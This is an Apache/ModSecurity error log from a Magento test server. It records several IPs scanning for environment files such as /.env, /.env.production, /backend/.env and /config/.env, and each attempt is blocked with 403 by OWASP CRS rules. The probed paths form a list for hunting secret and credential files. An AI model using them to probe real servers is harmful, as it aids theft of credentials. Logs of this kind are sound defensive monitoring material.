[Tue Dec 30 14:09:37.668726 2025] [:error] [pid 1074059] [client 195.178.110.160:60046] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aVPPEe9oALJ4W8ifGBsEBgAAAAA"]
[Tue Dec 30 14:09:37.668984 2025] [:error] [pid 1074059] [client 195.178.110.160:60046] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aVPPEe9oALJ4W8ifGBsEBgAAAAA"]
[Tue Dec 30 14:09:38.763556 2025] [:error] [pid 1074062] [client 195.178.110.160:60088] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aVPPEh0MFhx24awcLWAvOQAAAAM"]
[Tue Dec 30 14:09:38.763804 2025] [:error] [pid 1074062] [client 195.178.110.160:60088] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aVPPEh0MFhx24awcLWAvOQAAAAM"]
[Tue Dec 30 14:09:38.763958 2025] [:error] [pid 1074062] [client 195.178.110.160:60088] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aVPPEh0MFhx24awcLWAvOQAAAAM"]
[Tue Dec 30 14:09:38.937164 2025] [:error] [pid 1074996] [client 195.178.110.160:60094] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aVPPEn-umz5_xg-D79wMzwAAAAY"]
[Tue Dec 30 14:09:38.937391 2025] [:error] [pid 1074996] [client 195.178.110.160:60094] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aVPPEn-umz5_xg-D79wMzwAAAAY"]
[Tue Dec 30 14:09:38.937546 2025] [:error] [pid 1074996] [client 195.178.110.160:60094] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aVPPEn-umz5_xg-D79wMzwAAAAY"]
[Tue Dec 30 14:09:39.168726 2025] [:error] [pid 1076242] [client 195.178.110.160:60104] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVPPEy0_a1jZPrTzT4_TBwAAAAc"]
[Tue Dec 30 14:09:39.168973 2025] [:error] [pid 1076242] [client 195.178.110.160:60104] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVPPEy0_a1jZPrTzT4_TBwAAAAc"]
[Tue Dec 30 14:09:39.169145 2025] [:error] [pid 1076242] [client 195.178.110.160:60104] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVPPEy0_a1jZPrTzT4_TBwAAAAc"]
[Tue Dec 30 14:09:39.535745 2025] [:error] [pid 1074060] [client 195.178.110.160:60120] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aVPPE2kuKTvBtTO8F861_wAAAAE"]
[Tue Dec 30 14:09:39.535973 2025] [:error] [pid 1074060] [client 195.178.110.160:60120] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aVPPE2kuKTvBtTO8F861_wAAAAE"]
[Tue Dec 30 14:09:39.536118 2025] [:error] [pid 1074060] [client 195.178.110.160:60120] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aVPPE2kuKTvBtTO8F861_wAAAAE"]
[Tue Dec 30 14:09:39.839381 2025] [:error] [pid 1074061] [client 195.178.110.160:60136] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aVPPEzshcYdIl9SnQghAZgAAAAI"]
[Tue Dec 30 14:09:39.839623 2025] [:error] [pid 1074061] [client 195.178.110.160:60136] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aVPPEzshcYdIl9SnQghAZgAAAAI"]
[Tue Dec 30 14:09:39.839788 2025] [:error] [pid 1074061] [client 195.178.110.160:60136] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aVPPEzshcYdIl9SnQghAZgAAAAI"]
[Tue Dec 30 14:09:40.170789 2025] [:error] [pid 1074063] [client 195.178.110.160:60144] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVPPFAGuPbj6UeGK0iq8CgAAAAQ"]
[Tue Dec 30 14:09:40.171042 2025] [:error] [pid 1074063] [client 195.178.110.160:60144] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVPPFAGuPbj6UeGK0iq8CgAAAAQ"]
[Tue Dec 30 14:09:40.171234 2025] [:error] [pid 1074063] [client 195.178.110.160:60144] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aVPPFAGuPbj6UeGK0iq8CgAAAAQ"]
[Tue Dec 30 14:09:40.340976 2025] [:error] [pid 1074324] [client 195.178.110.160:60152] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aVPPFOlTTj38IyOu6gtvQQAAAAU"]
[Tue Dec 30 14:09:40.341210 2025] [:error] [pid 1074324] [client 195.178.110.160:60152] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aVPPFOlTTj38IyOu6gtvQQAAAAU"]
[Tue Dec 30 14:09:40.341395 2025] [:error] [pid 1074324] [client 195.178.110.160:60152] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aVPPFOlTTj38IyOu6gtvQQAAAAU"]
[Tue Dec 30 14:09:40.482831 2025] [authz_core:error] [pid 1074062] [client 195.178.110.160:60154] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Tue Dec 30 17:16:50.671909 2025] [:error] [pid 1074061] [client 204.76.203.25:35968] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVP68jshcYdIl9SnQghAegAAAAI"]
[Tue Dec 30 17:16:50.672213 2025] [:error] [pid 1074061] [client 204.76.203.25:35968] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVP68jshcYdIl9SnQghAegAAAAI"]
[Tue Dec 30 17:16:50.672369 2025] [:error] [pid 1074061] [client 204.76.203.25:35968] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVP68jshcYdIl9SnQghAegAAAAI"]
[Wed Dec 31 10:34:10.784855 2025] [:error] [pid 1096246] [client 204.76.203.25:53406] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVTuEkeyC1gpox9HeXVEGAAAAAA"]
[Wed Dec 31 10:34:10.785146 2025] [:error] [pid 1096246] [client 204.76.203.25:53406] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVTuEkeyC1gpox9HeXVEGAAAAAA"]
[Wed Dec 31 10:34:10.785322 2025] [:error] [pid 1096246] [client 204.76.203.25:53406] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVTuEkeyC1gpox9HeXVEGAAAAAA"]
[Thu Jan 01 09:26:22.659604 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVYvrnNXDBI5CgrqjG-_xwAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:22.659862 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVYvrnNXDBI5CgrqjG-_xwAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:22.660040 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVYvrnNXDBI5CgrqjG-_xwAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:22.984851 2026] [authz_core:error] [pid 1117412] [client 54.75.202.236:53972] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env, referer: https://www.google.com/
[Thu Jan 01 09:26:23.065120 2026] [authz_core:error] [pid 1117412] [client 54.75.202.236:53972] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env, referer: https://www.google.com/
[Thu Jan 01 09:26:23.145686 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zQAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.145926 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zQAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.146078 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zQAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.226390 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zgAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.226637 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zgAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.226820 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zgAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:23.307095 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aVYvr3NXDBI5CgrqjG-_zwAAAAQ"], referer: https://www.google.com/
